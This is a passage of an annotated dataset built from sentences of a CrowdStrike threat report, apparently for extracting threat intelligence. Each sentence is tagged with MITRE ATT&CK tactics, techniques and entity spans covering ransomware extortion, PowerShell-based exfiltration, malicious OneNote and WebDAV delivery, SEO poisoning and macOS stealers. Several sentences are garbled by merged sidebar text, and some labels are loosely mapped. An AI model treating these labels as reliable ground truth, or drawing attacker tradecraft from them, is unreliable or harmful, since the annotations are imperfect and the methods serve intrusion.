"sentence_text": "This data could be leveraged by distinct threat actors to target victim organizations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p43-s372-c0ce90", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 43, "sentence_id": 372, "context_before": "This data could be leveraged...", "sentence_text": "► Creating separate victim posts for third-party organizations whose data was identified in the victim network but were not subjected to compromises.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": null, "procedure": "Create separate victim posts for third-party organizations whose data was identified in victim networks.", "entities": [ { "text": "Creating separate victim posts for third-party organizations", "start": 2, "end": 62, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p43-s373-8d90ab", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 43, "sentence_id": 373, "context_before": "► Creating separate victim posts for third-party organizations whose data was identified in the victim network but were not subjected to compromises.", "sentence_text": "► Multiple RaaS affiliates compromised mental and physical healthcare entities and highlighted their access to — and provided previews of — sensitive data and records, including patient photos, in DLS posts.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0010", "name": "Exfiltration" }, { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1567", "name": "Exfiltration Over Web Service" } ], "procedure": "RaaS affiliates compromise healthcare entities and publish previews of sensitive data to demonstrate access and pressure victims.", "entities": [ { "text": "Multiple RaaS affiliates", "start": 2, "end": 26, "label": "ThreatActor" }, { "text": "compromised mental and physical healthcare entities", "start": 27, "end": 78, "label": "Action" }, { "text": "highlighted their access", "start": 83, "end": 107, "label": "Action" }, { "text": "provided previews of — sensitive data and records", "start": 117, "end": 166, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p43-s374-377f9a", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 43, "sentence_id": 374, "context_before": "► Multiple RaaS affiliates compromised mental and physical healthcare entities and highlighted their access to — and provided previews of — sensitive data and records, including patient photos, in DLS posts.", "sentence_text": "► VICE SPIDER continued to use a PS script to automate data exfiltration but customized the script to search for directory and filenames containing strings such as *violence*, *abuse*, *Theft*, *Stealing*, *humiliation*, *harassment* and *death*, likely to identify data that posed a high potential for embarrassing victim organizations.", "relevant": "yes", "tactic": [ { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1020", "name": "Automated Exfiltration" } ], "procedure": "use a PS script to automate data exfiltration and customize the script to search for directory and filenames containing specific strings", "entities": [ { "text": "VICE SPIDER", "start": 2, "end": 13, "label": "ThreatActor" }, { "text": "PS script", "start": 33, "end": 42, "label": "MalwareTool" }, { "text": "use a PS script to automate data exfiltration", "start": 27, "end": 72, "label": "Action" }, { "text": "customized the script to search for directory and filenames containing strings", "start": 77, "end": 155, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p43-s375-4d5538", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 43, "sentence_id": 375, "context_before": "► VICE SPIDER continued to use a PS script to automate data exfiltration but customized the script to search for directory and filenames containing strings such as *violence*, *abuse*, *Theft*, *Stealing*, *humiliation*, *harassment* and *death*, likely to identify data that posed a high potential for embarrassing victim organizations.", "sentence_text": "12 https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p44-s376-e805f7", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 44, "sentence_id": 376, "context_before": "12 https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1", "sentence_text": "Outlook\nThe record number of victims named on DLSs throughout 2023 demonstratesBGH’s status as the current most significant eCrime threat to organizations across »", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p44-s377-b5134f", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 44, "sentence_id": 377, "context_before": "Outlook\nThe record number of victims named on DLSs throughout 2023 demonstratesBGH’s status as the current most significant eCrime threat to organizations across »", "sentence_text": "THE RECORD NUMBER OF VICTIMS all geographical regions and industries.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p44-s378-e89e34", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 44, "sentence_id": 378, "context_before": "THE RECORD NUMBER OF VICTIMS all geographical regions and industries.", "sentence_text": "This increase is driven by various factors, NAMED ON DLSs THROUGHOUT 2023 including GRACEFUL SPIDER’s zero-day exploitation campaigns, BGH adversaries’ DEMONSTRATES BGH’S STATUS AS continued targeting of unmanaged devices — such as edge gateway devices THE CURRENT MOST SIGNIFICANT for initial access and targeting VMware ESXi for encryption — and an increasing ECRIME THREAT TO ORGANIZATIONS number of adversaries naming victims following data theft incidents that did not ACROSS ALL GEOGRAPHICAL REGIONS include ransomware deployment.\nAND INDUSTRIES.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" }, { "id": "T1133", "name": "External Remote Services" }, { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "Conduct zero-day exploitation campaigns", "entities": [ { "text": "BGH adversaries", "start": 135, "end": 150, "label": "Action" }, { "text": "continued targeting of unmanaged devices", "start": 181, "end": 221, "label": "Action" }, { "text": "edge gateway devices", "start": 232, "end": 252, "label": "Infrastructure_Indicator" }, { "text": "zero-day exploitation campaigns", "start": 102, "end": 133, "label": "Action" }, { "text": "GRACEFUL SPIDER", "start": 84, "end": 99, "label": "ThreatActor" }, { "text": "targeting VMware ESXi for encryption", "start": 305, "end": 341, "label": "Action" }, { "text": "data theft incidents", "start": 440, "end": 460, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p44-s379-282c37", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 44, "sentence_id": 379, "context_before": "This increase is driven by various factors, NAMED ON DLSs THROUGHOUT 2023 including GRACEFUL SPIDER’s zero-day exploitation campaigns, BGH adversaries’ DEMONSTRATES BGH’S STATUS AS continued targeting of unmanaged devices — such as edge gateway devices THE CURRENT MOST SIGNIFICANT for initial access and targeting VMware ESXi for encryption — and an increasing ECRIME THREAT TO ORGANIZATIONS number of adversaries naming victims following data theft incidents that did not ACROSS ALL GEOGRAPHICAL REGIONS include ransomware deployment.\nAND INDUSTRIES.", "sentence_text": "Though CrowdStrike CAO assesses that ransomware will highly likely remain the primary extortion method through 2024, BGH adversaries will increasingly emphasize stolen-data exploitation as a means to pressure victims into payment.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1657", "name": "Financial Theft" } ], "procedure": "Used stolen data to pressure victims into payments", "entities": [ { "text": "BGH adversaries", "start": 117, "end": 132, "label": "ThreatActor" }, { "text": "stolen-data exploitation", "start": 161, "end": 185, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p44-s380-fce8d5", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 44, "sentence_id": 380, "context_before": "Though CrowdStrike CAO assesses that ransomware will highly likely remain the primary extortion method through 2024, BGH adversaries will increasingly emphasize stolen-data exploitation as a means to pressure victims into payment.", "sentence_text": "This is particularly true as U.S. Securities and Exchange Commission (SEC) rules impact major cybersecurity incident disclosures.13 SCATTERED SPIDER’s Alphv ransomware underscored the effectiveness of extortion as a tactic throughout 2023.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p44-s381-f34888", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 44, "sentence_id": 381, "context_before": "This is particularly true as U.S. Securities and Exchange Commission (SEC) rules impact major cybersecurity incident disclosures.13 SCATTERED SPIDER’s Alphv ransomware underscored the effectiveness of extortion as a tactic throughout 2023.", "sentence_text": "Coordinated international law enforcement operations targeted BGH actors in 2023.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p44-s382-e5dfcc", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 44, "sentence_id": 382, "context_before": "Coordinated international law enforcement operations targeted BGH actors in 2023.", "sentence_text": "The disruption of HIVE SPIDER’s Hive RaaS and MALLARD SPIDER’s enabling QakBot malware left voids that were quickly filled by competing RaaS and malware as a service (MaaS) actors, demonstrating the eCrime ecosystem’s resilience against takedowns that do not arrest the individuals behind the operations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p44-s383-3c05c9", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 44, "sentence_id": 383, "context_before": "The disruption of HIVE SPIDER’s Hive RaaS and MALLARD SPIDER’s enabling QakBot malware left voids that were quickly filled by competing RaaS and malware as a service (MaaS) actors, demonstrating the eCrime ecosystem’s resilience against takedowns that do not arrest the individuals behind the operations.", "sentence_text": "13 https://www.sec.gov/news/press-release/2023-139", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p45-s384-90ed84", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 45, "sentence_id": 384, "context_before": "13 https://www.sec.gov/news/press-release/2023-139", "sentence_text": "eCRIME ENABLERS\nMalware Delivery Trends Following Mark-of-the-Web Patch on ISO Files Adversaries in 2023 experimented with malware delivery methods that do not rely on macros or ISO files, following a sharp increase in ISO files being used for malware delivery and a subsequent patch by Microsoft for a Mark-of-the-Web bypass vulnerability in container files in 2022.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1204.002", "name": "User Execution: Malicious File" } ], "procedure": "Experiment with malware delivery methods that do not rely on macros or ISO files after prior use of ISO files for malware delivery.", "entities": [ { "text": "Adversaries", "start": 85, "end": 96, "label": "ThreatActor" }, { "text": "experimented with malware delivery methods", "start": 105, "end": 147, "label": "Action" }, { "text": "ISO files", "start": 178, "end": 187, "label": "Infrastructure_Indicator" }, { "text": "ISO files being used for malware delivery", "start": 219, "end": 260, "label": "Action" }, { "text": "Mark-of-the-Web bypass vulnerability", "start": 303, "end": 339, "label": "Infrastructure_Indicator" }, { "text": "container files", "start": 343, "end": 358, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p45-s385-bb9f23", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 45, "sentence_id": 385, "context_before": "eCRIME ENABLERS\nMalware Delivery Trends Following Mark-of-the-Web Patch on ISO Files Adversaries in 2023 experimented with malware delivery methods that do not rely on macros or ISO files, following a sharp increase in ISO files being used for malware delivery and a subsequent patch by Microsoft for a Mark-of-the-Web bypass vulnerability in container files in 2022.", "sentence_text": "The number of malware campaigns using malicious OneNote files for initial access rose significantly14 between late December 2022 and March 2023, with the technique’s earliest adopters including criminals distributing information stealers and commodity malware.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1587.001", "name": "Malware" } ], "procedure": "Used malicious OneNote files for initial access", "entities": [ { "text": "malicious OneNote files", "start": 38, "end": 61, "label": "MalwareTool" }, { "text": "initial access", "start": 66, "end": 80, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p45-s386-3803b0", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 45, "sentence_id": 386, "context_before": "The number of malware campaigns using malicious OneNote files for initial access rose significantly14 between late December 2022 and March 2023, with the technique’s earliest adopters including criminals distributing information stealers and commodity malware.", "sentence_text": "Though no one technique has emerged as a front-runner to replace OneNote files, adversaries continue to experiment with malware delivery methods.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p45-s387-30c61c", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 45, "sentence_id": 387, "context_before": "Though no one technique has emerged as a front-runner to replace OneNote files, adversaries continue to experiment with malware delivery methods.", "sentence_text": "Adversaries such as LUNAR SPIDER, APOTHECARY SPIDER and HERMIT SPIDER have consistently used malvertising and search engine optimization (SEO) poisoning.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1608.004", "name": "Drive-by Target" }, { "id": "T1608.006", "name": "SEO Poisoning" } ], "procedure": "Used malvertising and SEO poisoning", "entities": [ { "text": "LUNAR SPIDER", "start": 20, "end": 32, "label": "ThreatActor" }, { "text": "APOTHECARY SPIDER", "start": 34, "end": 51, "label": "ThreatActor" }, { "text": "HERMIT SPIDER", "start": 56, "end": 69, "label": "ThreatActor" }, { "text": "used malvertising and search engine optimization (SEO) poisoning.", "start": 88, "end": 153, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p45-s388-18b644", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 45, "sentence_id": 388, "context_before": "Adversaries such as LUNAR SPIDER, APOTHECARY SPIDER and HERMIT SPIDER have consistently used malvertising and search engine optimization (SEO) poisoning.", "sentence_text": "Adversaries reliant on spam campaigns use multiple techniques and file types to deliver malware.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p45-s389-787907", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 45, "sentence_id": 389, "context_before": "Adversaries reliant on spam campaigns use multiple techniques and file types to deliver malware.", "sentence_text": "Several adversaries have used PDF files containing links to files hosted on external URLs as well as HTML smuggling.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" }, { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1608.005", "name": "Link Target" }, { "id": "T1566.002", "name": "Spearphishing Link" } ], "procedure": "Used PDF files that contains malicious URLs", "entities": [ { "text": " PDF files", "start": 29, "end": 39, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p45-s390-78babd", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 45, "sentence_id": 390, "context_before": "Several adversaries have used PDF files containing links to files hosted on external URLs as well as HTML smuggling.", "sentence_text": "More novel techniques have included using WebDAV files to distribute payloads.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" }, { "id": "T1566.001", "name": "Spearphishing Attachment" } ], "procedure": "Used WebDAV files to distribute payloads", "entities": [ { "text": "WebDAV", "start": 42, "end": 48, "label": "MalwareTool" }, { "text": "distribute payloads.", "start": 58, "end": 78, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p45-s391-70f145", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 45, "sentence_id": 391, "context_before": "More novel techniques have included using WebDAV files to distribute payloads.", "sentence_text": "Toward the end of 2023, multiple malware families were distributed in new lures containing fake browser updates.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036.003", "name": "Rename Legitimate Utilities" }, { "id": "T1189", "name": "Drive-by Compromise" } ], "procedure": "Distributed malware families", "entities": [ { "text": "malware families", "start": 33, "end": 49, "label": "MalwareTool" }, { "text": "distributed in new lures containing fake browser updates", "start": 55, "end": 111, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p45-s392-d67cfc", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 45, "sentence_id": 392, "context_before": "Toward the end of 2023, multiple malware families were distributed in new lures containing fake browser updates.", "sentence_text": "Malvertising and SEO Poisoning Malvertising is a technique in which threat actors create malicious advertisements to facilitate criminal activity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p45-s393-eeff81", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 45, "sentence_id": 393, "context_before": "Malvertising and SEO Poisoning Malvertising is a technique in which threat actors create malicious advertisements to facilitate criminal activity.", "sentence_text": "Adversaries use SEO poisoning to falsely promote malicious websites to higher ranks in search engine results.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1608.006", "name": "SEO Poisoning" } ], "procedure": "Used SEO poisoning to promote malicious websites", "entities": [ { "text": "use SEO poisoning", "start": 12, "end": 29, "label": "Action" }, { "text": "promote malicious websites", "start": 41, "end": 67, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p45-s394-b35c28", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 45, "sentence_id": 394, "context_before": "Adversaries use SEO poisoning to falsely promote malicious websites to higher ranks in search engine results.", "sentence_text": "Similar to malvertising, SEO poisoning relies on users believing the results closest to the top of a search result are the most credible.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p45-s395-ecea59", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 45, "sentence_id": 395, "context_before": "Similar to malvertising, SEO poisoning relies on users believing the results closest to the top of a search result are the most credible.", "sentence_text": "Throughout 2023, adversaries such as LUNAR SPIDER regularly abused Google advertisements to ensure their malicious ads appeared at the top of search result pages.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1608.006", "name": "SEO Poisoning" } ], "procedure": "Abused Google Advertisements to make the dangerous ads appear at the top", "entities": [ { "text": "LUNAR SPIDER", "start": 37, "end": 49, "label": "ThreatActor" }, { "text": "abused Google advertisements", "start": 60, "end": 88, "label": "Action" }, { "text": "ensure their malicious ads appeared at the top of search result pages", "start": 92, "end": 161, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p45-s396-0e0107", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 45, "sentence_id": 396, "context_before": "Throughout 2023, adversaries such as LUNAR SPIDER regularly abused Google advertisements to ensure their malicious ads appeared at the top of search result pages.", "sentence_text": "Threat actors such as SolarMarker operators regularly used SEO poisoning throughout 2023.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1608", "name": "Stage Capabilities" } ], "procedure": "SolarMarker operators used SEO poisoning campaigns to deliver malicious content and gain initial access during 2023.", "entities": [ { "text": "SolarMarker operators", "start": 22, "end": 43, "label": "ThreatActor" }, { "text": "used SEO poisoning", "start": 54, "end": 72, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p45-s397-693e75", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 45, "sentence_id": 397, "context_before": "Threat actors such as SolarMarker operators regularly used SEO poisoning throughout 2023.", "sentence_text": "14 https://www.crowdstrike.com/blog/qakbot-ecrime-campaign-leverages-microsoft-onenote-for-distribution/\n15 https://learn.microsoft.com/en-us/deployoffice/security/onenote-extension-block", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p46-s398-429227", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 46, "sentence_id": 398, "context_before": "14 https://www.crowdstrike.com/blog/qakbot-ecrime-campaign-leverages-microsoft-onenote-for-distribution/\n15 https://learn.microsoft.com/en-us/deployoffice/security/onenote-extension-block", "sentence_text": "All observed PROFIT FROM PROVIDING INITIAL macOS malware families are information stealers capable of harvesting ACCESS TO A VARIETY OF eCRIME stored passwords, cookies and cryptocurrency wallets.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" }, { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1555", "name": "Credentials from Password Stores" } ], "procedure": "Use macOS information-stealer malware to harvest stored passwords, cookies, and cryptocurrency wallets.", "entities": [ { "text": "macOS malware families", "start": 43, "end": 65, "label": "MalwareTool" }, { "text": "information stealers", "start": 70, "end": 90, "label": "MalwareTool" }, { "text": "harvesting ACCESS TO A VARIETY OF eCRIME stored passwords, cookies and cryptocurrency wallets", "start": 102, "end": 195, "label": "Action" }, { "text": "stored passwords, cookies and cryptocurrency wallets", "start": 143, "end": 195, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p46-s399-86f3cc", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 46, "sentence_id": 399, "context_before": "All observed PROFIT FROM PROVIDING INITIAL macOS malware families are information stealers capable of harvesting ACCESS TO A VARIETY OF eCRIME stored passwords, cookies and cryptocurrency wallets.", "sentence_text": "THREAT ACTORS IN 2023, WITH THE NUMBER OF ACCESSES ADVERTISED AMOS customers have distributed these tools via SEO poisoning as well as INCREASING BY 20% COMPARED fake play-to-earn games and illegitimate job advertisements.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1608.006", "name": "SEO Poisoning" }, { "id": "T1608.004", "name": "Drive-by Target" } ], "procedure": "Distributed tools by SEO poisoning, fake games and illegitimate job advertisements", "entities": [ { "text": "AMOS customers", "start": 62, "end": 76, "label": "ThreatActor" }, { "text": "SEO poisoning", "start": 110, "end": 123, "label": "Infrastructure_Indicator" }, { "text": "fake play-to-earn games", "start": 162, "end": 185, "label": "Infrastructure_Indicator" }, { "text": "illegitimate job advertisements", "start": 190, "end": 221, "label": "Infrastructure_Indicator" }, { "text": "distributed ", "start": 82, "end": 94, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p46-s400-812b79", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 46, "sentence_id": 400, "context_before": "THREAT ACTORS IN 2023, WITH THE NUMBER OF ACCESSES ADVERTISED AMOS customers have distributed these tools via SEO poisoning as well as INCREASING BY 20% COMPARED fake play-to-earn games and illegitimate job advertisements.", "sentence_text": "MacOS Stealer TO 2022.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p46-s401-e2ad81", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 46, "sentence_id": 401, "context_before": "MacOS Stealer TO 2022.", "sentence_text": "Although COOKIE SPIDER stated that a portion of its current 50 to 100 customers include BITWISE SPIDER and ALPHA SPIDER affiliates, CrowdStrike CAO cannot presently verify this claim.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p46-s402-b0a3fe", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 46, "sentence_id": 402, "context_before": "Although COOKIE SPIDER stated that a portion of its current 50 to 100 customers include BITWISE SPIDER and ALPHA SPIDER affiliates, CrowdStrike CAO cannot presently verify this claim.", "sentence_text": "macOS stealers gained traction in the eCrime ecosystem throughout 2023 due to their ability to enable opportunistic actors and ransomware affiliates during criminal operations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p46-s403-f3c042", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 46, "sentence_id": 403, "context_before": "macOS stealers gained traction in the eCrime ecosystem throughout 2023 due to their ability to enable opportunistic actors and ransomware affiliates during criminal operations.", "sentence_text": "Since the majority of information stealers typically target Windows-based OSs, the increasing number of macOS stealers in the eCrime ecosystem has expanded eCrime profit opportunities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p46-s404-fa9792", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 46, "sentence_id": 404, "context_before": "Since the majority of information stealers typically target Windows-based OSs, the increasing number of macOS stealers in the eCrime ecosystem has expanded eCrime profit opportunities.", "sentence_text": "Access Brokers Persistently Provide Access Opportunities Access brokers continued to profit from providing initial access to a variety of eCrime threat actors in 2023, with the number of accesses advertised increasing by 20% compared to 2022.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p46-s405-d5e4dd", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 46, "sentence_id": 405, "context_before": "Access Brokers Persistently Provide Access Opportunities Access brokers continued to profit from providing initial access to a variety of eCrime threat actors in 2023, with the number of accesses advertised increasing by 20% compared to 2022.", "sentence_text": "The academic sector was the most frequently advertised, and advertisements for U.S.-based entities far surpassed all other regions.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p46-s406-a6080e", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 46, "sentence_id": 406, "context_before": "The academic sector was the most frequently advertised, and advertisements for U.S.-based entities far surpassed all other regions.", "sentence_text": "Initial access TTPs observed in 2023 were relatively consistent with those used in 2022 and regularly targeted and abused compromised credentials.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1212", "name": "Exploitation for Credential Access" } ], "procedure": "Abused compromised credentials", "entities": [ { "text": "targeted and abused compromised credentials", "start": 102, "end": 145, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p47-s407-6f8fbd", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 47, "sentence_id": 407, "context_before": "Initial access TTPs observed in 2023 were relatively consistent with those used in 2022 and regularly targeted and abused compromised credentials.", "sentence_text": "ACADEMIC RETAIL PROFESSIONAL SERVICES TECHNOLOGY SECTOR MANUFACTURINGINDUSTRIALS FINANCIAL SERVICES HEALTHCARE TELECOMMUNICATIONS MEDIA INCIDENT COUNT", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p48-s408-22c178", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 48, "sentence_id": 408, "context_before": "ACADEMIC RETAIL PROFESSIONAL SERVICES TECHNOLOGY SECTOR MANUFACTURINGINDUSTRIALS FINANCIAL SERVICES HEALTHCARE TELECOMMUNICATIONS MEDIA INCIDENT COUNT", "sentence_text": "Outlook\nThe rise of macOS malware and the evolution of malware delivery techniques demonstrate the eCrime ecosystem’s innovative nature.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p48-s409-04e5de", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 48, "sentence_id": 409, "context_before": "Outlook\nThe rise of macOS malware and the evolution of malware delivery techniques demonstrate the eCrime ecosystem’s innovative nature.", "sentence_text": "eCrime enablers will highly likely continue to innovate and offer new products on criminal marketplaces in 2024.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "Make new malware products", "entities": [ { "text": "eCrime enablers", "start": 0, "end": 15, "label": "ThreatActor" }, { "text": "innovate and offer new products", "start": 47, "end": 78, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p48-s410-b24c27", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 48, "sentence_id": 410, "context_before": "eCrime enablers will highly likely continue to innovate and offer new products on criminal marketplaces in 2024.", "sentence_text": "This assessment is made with high confidence based on historical trends in the eCrime ecosystem.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p48-s411-34c909", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 48, "sentence_id": 411, "context_before": "This assessment is made with high confidence based on historical trends in the eCrime ecosystem.", "sentence_text": "Malware delivery trends will likely continue to fluctuate, with SEO poisoning and malvertising remaining popular and spam-reliant adversaries proceeding to regularly experiment with different methods.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p48-s412-c7d633", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 48, "sentence_id": 412, "context_before": "Malware delivery trends will likely continue to fluctuate, with SEO poisoning and malvertising remaining popular and spam-reliant adversaries proceeding to regularly experiment with different methods.", "sentence_text": "This assessment is made with high confidence based on malware delivery trends observed since the end of 2022.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p48-s413-2085d9", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 48, "sentence_id": 413, "context_before": "This assessment is made with high confidence based on malware delivery trends observed since the end of 2022.", "sentence_text": "The access broker threat shows no immediate sign of abating.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p48-s414-564396", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 48, "sentence_id": 414, "context_before": "The access broker threat shows no immediate sign of abating.", "sentence_text": "These threat actors will almost certainly facilitate intrusions into various organizations worldwide throughout 2024 using a mixture of established TTPs alongside commodity and custom tooling.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p48-s415-8762d8", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 48, "sentence_id": 415, "context_before": "These threat actors will almost certainly facilitate intrusions into various organizations worldwide throughout 2024 using a mixture of established TTPs alongside commodity and custom tooling.", "sentence_text": "Starting in March 2023, CHEF SPIDER adopted sophisticated social engineering 